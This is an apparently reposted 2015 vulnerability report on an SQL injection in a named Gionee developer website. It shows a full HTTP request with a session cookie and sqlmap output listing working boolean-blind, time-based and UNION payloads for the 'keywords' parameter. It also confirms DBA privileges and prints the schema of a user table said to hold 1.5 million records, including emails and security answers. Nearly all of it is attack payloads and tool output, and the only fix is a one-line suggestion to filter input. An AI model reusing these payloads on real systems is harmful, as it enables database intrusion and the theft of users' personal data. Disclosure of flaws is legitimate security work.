
Root-privilege SQL injection on a Gionee site (affects 1.5 million users' records)

2015-12-24 09:13:56         Source: Looke   Author: Looke

As the title says.

Vulnerable system: Gionee Developer Platform

Vulnerable URL:

[screenshot]

Host: dev.anzhuoapk.com
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Referer: http://dev.anzhuoapk.com/application
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=schun19uqoup3m2o8g0f9nm2l6; Hm_lvt_eac5031a4265d98af4563220293c8e47=1446174018,1446174210,1446175352,1446451177; Hm_lpvt_eac5031a4265d98af4563220293c8e47=1446451190


The keywords parameter is injectable:

---
Parameter: keywords (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND 4031=4031 AND '%'='&status=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' AND (SELECT * FROM (SELECT(SLEEP(5)))aeuV) AND '%'='&status=

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: keywords=%E5%A6%82%E5%BD%B1%E9%9A%8F%E5%BD%A2%' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71707a6271,0x7a5948426a714447456f7566745244524350524750766b55434a494c4576495567427756686c4561,0x716a767a71),NULL,NULL,NULL-- &status=
---
[16:02:18] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.16
back-end DBMS: MySQL 5.0.12

Databases:

[screenshot: database list]

DBA privileges:

[screenshot: privilege check]

1.5 million user records:

[screenshot: row count]

Database: aorausermanagerdb
Table: aouserlistinfo
[9 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| Answer1      | varchar(100) |
| Answer2      | varchar(100) |
| Birthday     | date         |
| Email        | varchar(100) |
| Id           | int(11)      |
| Problem1Type | int(11)      |
| Problem2Type | int(11)      |
| Sex          | char(1)      |
| UserID       | int(11)      |
+--------------+--------------+

Solution:

Filter (sanitize) the user input.


Copyright: 红黑联盟 (a practical IT technology learning site)